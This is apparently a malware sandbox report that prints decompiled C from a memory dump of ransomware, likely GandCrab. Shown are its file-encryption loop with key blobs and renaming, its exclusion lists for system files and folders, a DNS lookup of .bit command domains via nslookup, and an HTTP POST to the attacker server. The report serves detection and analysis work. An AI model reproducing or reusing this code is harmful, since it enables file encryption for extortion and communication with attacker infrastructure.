				_v80 = 0x43002e;
				_v56 = _t162;
				_v76 = 0x410052;
				_v72 = 0x42;
				lstrcpyW(_t162, _t145);
				lstrcatW(_t162,  &_v80);
				asm("movdqa xmm0, [0xfbc0530]");
				asm("movdqu [ebp-0x88], xmm0");
				_push(_t151);
				asm("movdqa xmm0, [0xfbc0530]");
				asm("movdqu [ebp-0x78], xmm0");
				_v108 = 0;
				asm("movdqa xmm0, [0xfbc0530]");
				asm("movdqu [ebp-0x64], xmm0");
				E0FBB8400( &_v104, 0x10);
				E0FBB8400( &_v140, 0x20);
				_t96 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x88]");
				asm("movdqu [ebx], xmm0");
				asm("movdqu xmm0, [ebp-0x78]");
				_v24 = _t96;
				asm("movdqu [ebx+0x10], xmm0");
				_t97 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x64]");
				_t163 = _t97;
				_v60 = _t163;
				asm("movdqu [edi], xmm0");
				_v88 = 0x20;
				_v84 = 0x10;
				_t99 = E0FBB6660(_v20, _v32, _t96,  &_v88, 0x800);
				_t175 = _t173 + 0x18;
				if(_t99 != 0) {
					_t101 = E0FBB6660(_v20, _v32, _t163,  &_v84, 0x800);
					_t176 = _t175 + 0x14;
					if(_t101 != 0) {
						E0FBB8520( &_v140,  &_v388);
						_t177 = _t176 + 8;
						_t147 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
						_v28 = _t147;
						if(_t147 != 0xffffffff) {
							_t164 = VirtualAlloc(0, 8, 0x3000, 4);
							 *_t164 = 0;
							 *(_t164 + 4) = 0;
							_t107 = VirtualAlloc(0, 0x100001, 0x3000, 4);
							_t168 = 0;
							_v12 = _t107;
							_v36 = 0;
							while(ReadFile(_t147, _t107, 0x100000,  &_v8, 0) != 0) {
								_t124 = _v8;
								if(_t124 != 0) {
									_t149 = 0;
									_v64 = 0;
									_t168 =  <  ? 1 : _t168;
									 *_t164 =  *_t164 + _t124;
									asm("adc [edi+0x4], ebx");
									_t125 = _v8;
									_v48 = _t125;
									if((_t125 & 0x0000000f) != 0) {
										do {
											_t125 = _t125 + 1;
										} while ((_t125 & 0x0000000f) != 0);
										_v8 = _t125;
									}
									_v68 = VirtualAlloc(0, _t125, 0x3000, 4);
									E0FBB8B20(_t126, _v12, _v48);
									_t128 = _v8;
									_t177 = _t177 + 0xc;
									_v40 = _t128;
									if(VirtualAlloc(0, _t128, 0x3000, 4) != 0) {
										E0FBB36D0(_v68, _v40,  &_v64,  &_v388,  &_v104, _t129);
										_t149 = _v64;
										_t177 = _t177 + 0x10;
									}
									VirtualFree(_v68, 0, 0x8000);
									SetFilePointer(_v28,  ~_v48, 0, 1);
									if(WriteFile(_v28, _t149, _v8,  &_v16, 0) == 0) {
										_t168 = 1;
										_v36 = 1;
									}
									VirtualFree(_t149, 0, 0x8000);
									_t147 = _v28;
									if(_t168 == 0) {
										_t107 = _v12;
										continue;
									}
								}
								break;
							}
							VirtualFree(_v12, 0, 0x8000);
							if(_v36 == 0) {
								WriteFile(_t147, _v24, 0x100,  &_v16, 0);
								WriteFile(_t147, _v60, 0x100,  &_v16, 0);
								WriteFile(_t147, _t164, 0x10,  &_v16, 0);
							}
							CloseHandle(_t147);
							_v40 =  *_t164;
							VirtualFree(_t164, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							VirtualFree(_v60, 0, 0x8000);
							if(_v36 == 0) {
								MoveFileW(_v52, _v56);
							}
							_t165 = _v40;
						} else {
							VirtualFree(_t163, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							asm("xorps xmm0, xmm0");
							asm("movlpd [ebp-0x28], xmm0");
							_t165 = _v44;
						}
					} else {
						GetLastError();
						asm("xorps xmm0, xmm0");
						asm("movlpd [ebp-0x28], xmm0");
						_t165 = _v44;
					}
				} else {
					MessageBoxA(_t99, "Fatal error: rsaenh.dll is not initialized as well", "Fatal error", 0x10);
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x28], xmm0");
					_t165 = _v44;
				}
				VirtualFree(_v56, 0, 0x8000);
				return _t165;
			}

APIs

GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 0FBB37C4
SetFileAttributesW.KERNEL32(00000000,00000000), ref: 0FBB37CF
VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 0FBB380A
lstrcpyW.KERNEL32 ref: 0FBB3828
lstrcatW.KERNEL32(00000000,0043002E), ref: 0FBB3833

Part of subcall function 0FBB8400: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FBB8420
Part of subcall function 0FBB8400: VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0FBB8448
Part of subcall function 0FBB8400: GetModuleHandleA.KERNEL32(?), ref: 0FBB849D
Part of subcall function 0FBB8400: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FBB84AB
Part of subcall function 0FBB8400: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FBB84BA
Part of subcall function 0FBB8400: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FBB84DE
Part of subcall function 0FBB8400: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB84EC

Part of subcall function 0FBB8400: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0FBB292B), ref: 0FBB8500
Part of subcall function 0FBB8400: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0FBB292B), ref: 0FBB850E

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0FBB3896
VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0FBB38C1

Part of subcall function 0FBB6660: EnterCriticalSection.KERNEL32(0FBC2A48,?,0FBB38F4,00000000,00000000,00000000,?,00000800), ref: 0FBB666B
Part of subcall function 0FBB6660: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,?,0FBB38F4,00000000,00000000,00000000), ref: 0FBB6691
Part of subcall function 0FBB6660: GetLastError.KERNEL32(?,0FBB38F4,00000000,00000000,00000000), ref: 0FBB669B
Part of subcall function 0FBB6660: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FBB38F4,00000000,00000000,00000000), ref: 0FBB66B7

MessageBoxA.USER32 ref: 0FBB3908
GetLastError.KERNEL32 ref: 0FBB3943
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FBB3BB2

Strings

R, xrefs: 0FBB381A
B, xrefs: 0FBB3821
Fatal error: rsaenh.dll is not initialized as well, xrefs: 0FBB3902
Fatal error, xrefs: 0FBB38FD
., xrefs: 0FBB380E
, xrefs: 0FBB38DA

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Virtual$ContextCrypt$Alloc$AcquireFree$AttributesErrorFileLastRelease$AddressCriticalEnterHandleLibraryLoadMessageModuleProcSectionlstrcatlstrcpy
String ID: $.$B$Fatal error$Fatal error: rsaenh.dll is not initialized as well$R
API String ID: 1177701972-4284454829
Opcode ID: f35214e4a612cb066850913c47227ef25d1deb1ea7996798d1c3d066222b8aa8
Instruction ID: 36ea86b6a4136745f8c9800807d7b712a6d1202ff4db4a9840a9e8b821f3c888
Opcode Fuzzy Hash: f35214e4a612cb066850913c47227ef25d1deb1ea7996798d1c3d066222b8aa8
Instruction Fuzzy Hash: 8CC13D71E40309ABEB219BA4DC46FEEBBB8FF08711F204155FA40BA181DBF469558F54

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB5060 Relevance: 61.4, APIs: 8, Strings: 27, Instructions: 118
pipememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBB5060(CHAR* __ecx, void* __edx, WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				short _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t43;
				void* _t55;
				CHAR* _t62;
				void* _t64;

				_v72 = 0x73006e;
				_t55 = __edx;
				_v20 = 0;
				_t62 = __ecx;
				_v76 = 0;
				_v68 = 0x6f006c;
				_t41 =  !=  ?  &_v128 :  &_v72;
				_v64 = 0x6b006f;
				_a4 =  !=  ?  &_v128 :  &_v72;
				_v60 = 0x700075;
				_v56 = 0x250020;
				_v52 = 0x200053;
				_v48 = 0x73006e;
				_v44 = 0x2e0031;
				_v40 = 0x690076;
				_v36 = 0x6d0072;
				_v32 = 0x630061;
				_v28 = 0x2e0068;
				_v24 = 0x750072;
				_v128 = 0x73006e;
				_v124 = 0x6f006c;
				_v120 = 0x6b006f;
				_v116 = 0x700075;
				_v112 = 0x250020;
				_v108 = 0x200053;
				_v104 = 0x73006e;
				_v100 = 0x2e0032;
				_v96 = 0x690076;
				_v92 = 0x6d0072;
				_v88 = 0x630061;
				_v84 = 0x2e0068;
				_v80 = 0x750072;
				_v16.nLength = 0xc;
				_v16.bInheritHandle = 1;
				_v16.lpSecurityDescriptor = 0;
				_t43 = CreatePipe(0xfbc2a70, 0xfbc2a6c,  &_v16, 0);
				if(_t43 != 0) {
					_t43 = SetHandleInformation( *0xfbc2a70, 1, 0);
					if(_t43 == 0) {
						goto L1;
					} else {
						CreatePipe(0xfbc2a68, 0xfbc2a74,  &_v16, 0);
						_t43 = SetHandleInformation( *0xfbc2a74, 1, 0);
						if(_t43 == 0) {
							goto L1;
						} else {
							_t64 = VirtualAlloc(0, 0x2800, 0x3000, 4);
							if(_t64 == 0) {
								lstrcpyA(_t62, "fabian wosar <3");
								return 0;
							} else {
								wsprintfW(_t64, _a4, _t55);
								E0FBB4E10(_t64);
								E0FBB4FB0(_t55, _t62, _t55, _t62, _t64);
								VirtualFree(_t64, 0, 0x8000);
								return 0;
							}
						}
					}
				} else {
					L1:
					return _t43 | 0xffffffff;
				}
			}

APIs

CreatePipe.KERNEL32(0FBC2A70,0FBC2A6C,?,00000000,00000001,00000001,00000000), ref: 0FBB5165
SetHandleInformation.KERNEL32(00000001,00000000), ref: 0FBB5189
CreatePipe.KERNEL32(0FBC2A68,0FBC2A74,0000000C,00000000), ref: 0FBB519F
SetHandleInformation.KERNEL32(00000001,00000000), ref: 0FBB51AF
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 0FBB51C3
wsprintfW.USER32 ref: 0FBB51D4
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB51F5

Strings

u, xrefs: 0FBB50AF
2, xrefs: 0FBB5126
r, xrefs: 0FBB5134
S, xrefs: 0FBB50BD
, xrefs: 0FBB50B6
r, xrefs: 0FBB5149
, xrefs: 0FBB5111
a, xrefs: 0FBB513B
u, xrefs: 0FBB510A
1, xrefs: 0FBB50CB
n, xrefs: 0FBB50F5
S, xrefs: 0FBB5118
r, xrefs: 0FBB50D9
r, xrefs: 0FBB50EE
a, xrefs: 0FBB50E0
fabian wosar <3, xrefs: 0FBB5204
v, xrefs: 0FBB50D2
n, xrefs: 0FBB511F
h, xrefs: 0FBB5142
o, xrefs: 0FBB5095
l, xrefs: 0FBB50FC
n, xrefs: 0FBB506D
n, xrefs: 0FBB50C4
o, xrefs: 0FBB5103
v, xrefs: 0FBB512D
l, xrefs: 0FBB508B
h, xrefs: 0FBB50E7

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
String ID: $ $1$2$S$S$a$a$fabian wosar <3$h$h$l$l$n$n$n$n$o$o$r$r$r$r$u$u$v$v
API String ID: 1490407255-3072057902
Opcode ID: 4c6ea4709e3373fb6058f8490859ca85a6befc8a4ea807f7a4f4db018ac47591
Instruction ID: bc2920e67383321a1e7120325f6a5341f6e0df091b09c43d36c21db5198a0dde
Opcode Fuzzy Hash: 4c6ea4709e3373fb6058f8490859ca85a6befc8a4ea807f7a4f4db018ac47591
Instruction Fuzzy Hash: 29416F70E40308ABEB20CF95EC497EEBFB5FB04755F104159E904AB282C7FA45598F94

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB68F0 Relevance: 30.1, APIs: 11, Strings: 9, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0FBB68F0(WCHAR* __ecx) {
				int _t4;
				signed int _t5;
				signed int _t15;
				void* _t19;
				WCHAR* _t21;
				short* _t25;
				WCHAR* _t26;

				_t21 = __ecx;
				_t4 = lstrlenW(__ecx);
				_t5 = lstrlenW(_t21);
				_t1 = _t21 - 2; // -2
				_t25 = _t1 + _t5 * 2;
				_t19 = _t4 - 1;
				if(_t19 != 0) {
					do {
						_t25 = _t25 - 2;
						_t19 = _t19 - 1;
					} while ( *_t25 != 0x5c && _t19 != 0);
				}
				_t26 = _t25 + 2;
				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
						goto L5;
					} else {
						_t15 = lstrcmpiW(_t26, L"CRAB-DECRYPT.txt");
						asm("sbb eax, eax");
						return  ~_t15 + 1;
					}
				} else {
					L5:
					return 1;
				}
			}

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,0FBB6B03), ref: 0FBB68FC
lstrlenW.KERNEL32(00000000), ref: 0FBB6901
lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 0FBB692D
lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 0FBB6942
lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 0FBB694E
lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 0FBB695A
lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 0FBB6966
lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 0FBB6972
lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 0FBB697E
lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 0FBB698A
lstrcmpiW.KERNEL32(-00000004,CRAB-DECRYPT.txt), ref: 0FBB6996

Strings

boot.ini, xrefs: 0FBB696C
desktop.ini, xrefs: 0FBB6927
thumbs.db, xrefs: 0FBB6984
CRAB-DECRYPT.txt, xrefs: 0FBB6990
ntuser.dat, xrefs: 0FBB6948
iconcache.db, xrefs: 0FBB6954
autorun.inf, xrefs: 0FBB693C
bootsect.bak, xrefs: 0FBB6960
ntuser.dat.log, xrefs: 0FBB6978

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: lstrcmpi$lstrlen
String ID: CRAB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
API String ID: 203586893-3936223242
Opcode ID: d7b5665f533c2cfb38a4e36677939fd7dcd9c4ad1096bb63c78e30b7d9931445
Instruction ID: 6576a562e007e1e1f239c4b1185bea63addbd8a2eb72a6d1cc4ee8a8f20e08ca
Opcode Fuzzy Hash: d7b5665f533c2cfb38a4e36677939fd7dcd9c4ad1096bb63c78e30b7d9931445
Instruction Fuzzy Hash: C1119A62680627755A2026BDFC01EFF138ECED5A9038502EDE940E3017EBD5EA028DB5

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB6780 Relevance: 28.1, APIs: 7, Strings: 9, Instructions: 124
memoryCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E0FBB6780(void* __ecx) {
				void* _t12;
				intOrPtr* _t23;
				void* _t51;
				void* _t52;

				_t52 = __ecx;
				_t51 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
				if(E0FBB81F0(_t52, L"\\ProgramData\\") != 0 || E0FBB81F0(_t52, L"\\IETldCache\\") != 0 || E0FBB81F0(_t52, L"\\Boot\\") != 0 || E0FBB81F0(_t52, L"\\Program Files\\") != 0 || E0FBB81F0(_t52, L"\\Tor Browser\\") != 0 || E0FBB81F0(_t52, L"Ransomware") != 0 || E0FBB81F0(_t52, L"\\All Users\\") != 0 || E0FBB81F0(_t52, L"\\Local Settings\\") != 0) {
					L18:
					VirtualFree(_t51, 0, 0x8000);
					return 0;
				} else {
					_t12 = E0FBB81F0(_t52, L"\\Windows\\");
					if(_t12 != 0) {
						goto L18;
					} else {
						_t23 = __imp__SHGetSpecialFolderPathW;
						_push(_t12);
						_push(0x2a);
						_push(_t51);
						_push(_t12);
						if( *_t23() == 0 || E0FBB81F0(_t52, _t51) == 0) {
							_push(0);
							_push(0x2b);
							_push(_t51);
							_push(0);
							if( *_t23() == 0 || E0FBB81F0(_t52, _t51) == 0) {
								_push(0);
								_push(0x24);
								_push(_t51);
								_push(0);
								if( *_t23() == 0 || E0FBB81F0(_t52, _t51) == 0) {
									_push(0);
									_push(0x1c);
									_push(_t51);
									_push(0);
									if( *_t23() == 0 || E0FBB81F0(_t52, _t51) == 0) {
										VirtualFree(_t51, 0, 0x8000);
										return 1;
									} else {
										goto L18;
									}
								} else {
									goto L18;
								}
							} else {
								goto L18;
							}
						} else {
							goto L18;
						}
					}
				}
			}

APIs

VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0FBB6E06,00000000,?,?), ref: 0FBB6793
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0FBB6E06,00000000,?,?), ref: 0FBB685A
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0FBB6E06,00000000,?,?), ref: 0FBB6874
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0FBB6E06,00000000,?,?), ref: 0FBB688E
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0FBB6E06,00000000,?,?), ref: 0FBB68A8
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0FBB6E06,00000000,?,?), ref: 0FBB68C8
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0FBB6E06,00000000,?,?), ref: 0FBB68DD

Strings

\Local Settings\, xrefs: 0FBB6827
\IETldCache\, xrefs: 0FBB67AF
\Boot\, xrefs: 0FBB67C3
\All Users\, xrefs: 0FBB6813
\ProgramData\, xrefs: 0FBB6799
\Windows\, xrefs: 0FBB683B
Ransomware, xrefs: 0FBB67FF
\Program Files\, xrefs: 0FBB67D7
\Tor Browser\, xrefs: 0FBB67EB

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: FolderPathSpecial$Virtual$Free$Alloc
String ID: Ransomware$\All Users\$\Boot\$\IETldCache\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\$\Windows\
API String ID: 1363212851-3735464813
Opcode ID: 1fb3374da3169ecb4a33aef8ad2a25d8de082f9fbcc75af7cf98fb019e3bc3b5
Instruction ID: 12a89847242ca74bccf5138d445667158c53a2d58b0ab8148393a27209ca8ecc
Opcode Fuzzy Hash: 1fb3374da3169ecb4a33aef8ad2a25d8de082f9fbcc75af7cf98fb019e3bc3b5
Instruction Fuzzy Hash: BC310F2274176122E92022663D15BFF414FCBC9A45F5040EEAA05EE2C2EFD8DC038FA9

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB5220 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 91
memorystringsleepCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0FBB5220() {
				WCHAR* _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				short _v40;
				char _v56;
				short _v60;
				intOrPtr _v64;
				char _v80;
				WCHAR* _t26;
				intOrPtr _t27;
				long _t32;
				WCHAR* _t37;
				void* _t39;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				void* _t48;
				WCHAR* _t49;
				void* _t52;
				void* _t53;

				asm("movdqa xmm0, [0xfbc0540]");
				_v36 =  &_v56;
				asm("movdqu [ebp-0x34], xmm0");
				_v32 =  &_v80;
				asm("movdqa xmm0, [0xfbc0520]");
				_v40 = 0x74;
				asm("movdqu [ebp-0x4c], xmm0");
				_v64 = 0x69622e6d;
				_v60 = 0x74;
				_v24 = 0x62636467;
				_v20 = 0x7469622e;
				_v16 = 0;
				_v28 =  &_v24;
				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4);
				_t37 = _t26;
				_v8 = _t37;
				if(_t37 != 0) {
					_t40 = 0;
					_t48 = 1;
					_t45 = 0;
					while(1) {
						_t27 =  *((intOrPtr*)(_t52 + _t45 * 4 - 0x20));
						_t45 = _t45 + 1;
						_v12 = _t27;
						if(_t45 == 3) {
							asm("sbb esi, esi");
							_t48 =  ~(_t48 - 1) + 2;
							_t45 = 0;
						}
						if(_t40 == 0xffffffff) {
							Sleep(0x3e8);
						}
						_t39 = VirtualAlloc(0, 2 + lstrlenW(_t37) * 2, 0x3000, 4);
						_t41 = _t39;
						E0FBB5060(_t41, _v12, _t48);
						_t53 = _t53 + 4;
						_t32 = lstrcmpiA(_t39, "fabian wosar <3");
						if(_t32 != 0) {
							break;
						}
						VirtualFree(_t39, _t32, 0x8000);
						_t37 = _v8;
						_t40 = _t41 | 0xffffffff;
					}
					_t49 = _v8;
					wsprintfW(_t49, L"%S", _t39);
					VirtualFree(_t39, 0, 0x8000);
					_t26 = _t49;
				}
				return _t26;
			}

APIs

VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,00000000,00000000,00000000), ref: 0FBB5288
Sleep.KERNEL32(000003E8), ref: 0FBB52C5
lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0FBB52D3
VirtualAlloc.KERNEL32(00000000,00000000), ref: 0FBB52E3
lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0FBB52FF
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB5310
wsprintfW.USER32 ref: 0FBB5328
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB5339

Strings

m.bi, xrefs: 0FBB5266
t, xrefs: 0FBB525B
.bit, xrefs: 0FBB527A
fabian wosar <3, xrefs: 0FBB52F9
gdcb, xrefs: 0FBB5273
t, xrefs: 0FBB526D

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
String ID: .bit$fabian wosar <3$gdcb$m.bi$t$t
API String ID: 2709691373-2847225850
Opcode ID: 005bfdac74660a822d7ac29ea91ab447d59c2031eef9fe0d8f59d211d7a6b3e6
Instruction ID: 024b3510ab1c8e783e277d8e7fd3a9fef89ce46bd0db71b923bd727edd558b31
Opcode Fuzzy Hash: 005bfdac74660a822d7ac29ea91ab447d59c2031eef9fe0d8f59d211d7a6b3e6
Instruction Fuzzy Hash: A031D471E00309ABDB10DFA5ED86BEEBB78EF48311F100159FA05B7281D6F45A018F91

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB54F0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 117
stringmemorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E0FBB54F0(CHAR* __ecx, CHAR** __edx, intOrPtr _a8) {
				void* _v8;
				CHAR* _v12;
				void* _v16;
				CHAR** _v20;
				void* _v24;
				char _v28;
				short _v124;
				void* _t40;
				CHAR* _t44;
				CHAR* _t46;
				void* _t47;
				void* _t55;
				void* _t56;
				CHAR* _t58;
				void* _t59;

				_t46 = __ecx;
				_v20 = __edx;
				_v12 = __ecx;
				E0FBB7E40( &_v28);
				_v16 = E0FBB5220();
				_t55 = 0x400 + lstrlenA(_t46) * 2;
				_t7 = _t55 + 1; // 0x1
				_t47 = VirtualAlloc(0, _t7, 0x3000, 0x40);
				_v8 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
				if(_t47 == 0) {
					L3:
					_t58 = 0;
					L4:
					lstrcatA(_t58, _v12);
					asm("movdqu xmm0, [0xfbbfb40]");
					asm("movdqu [ebp-0x78], xmm0");
					asm("movdqu xmm0, [0xfbbfb50]");
					asm("movdqu [ebp-0x68], xmm0");
					asm("movdqu xmm0, [0xfbbfb60]");
					asm("movdqu [ebp-0x58], xmm0");
					asm("movdqu xmm0, [0xfbbfb70]");
					asm("movdqu [ebp-0x48], xmm0");
					asm("movdqu xmm0, [0xfbbfb80]");
					asm("movdqu [ebp-0x38], xmm0");
					asm("movdqu xmm0, [0xfbbfb90]");
					asm("movdqu [ebp-0x28], xmm0");
					lstrlenA(_t58);
					_t56 = 0;
					_push(lstrlenW( &_v124));
					_push( &_v124);
					_push(L"POST");
					_push(0x31fff);
					_push(_v8);
					_push(lstrlenA(_t58));
					_push(_t58);
					_t59 = _v16;
					_push(L"popkadurak");
					_push(_t59);
					if(E0FBB8050( &_v28) != 0) {
						_t56 = 1;
						if(_a8 != 0) {
							_v12 = 0;
							if(E0FBB53D0(_v8,  &_v12) == 0) {
								_t56 = 0;
							} else {
								_t44 = _v12;
								if(_t44 != 0) {
									 *_v20 = _t44;
								}
							}
						}
					}
					VirtualFree(_t59, 0, 0x8000);
					VirtualFree(_v8, 0, 0x8000);
					VirtualFree(_t47, 0, 0x8000);
					_t40 = _v24;
					if(_t40 != 0) {
						InternetCloseHandle(_t40);
					}
					return _t56;
				}
				_t9 = _t55 + 1; // 0x1
				if(_t55 >= _t9) {
					goto L3;
				} else {
					_t58 = _t47;
					goto L4;
				}
			}

APIs

Part of subcall function 0FBB7E40: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0FBB8024
Part of subcall function 0FBB7E40: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0FBB803D

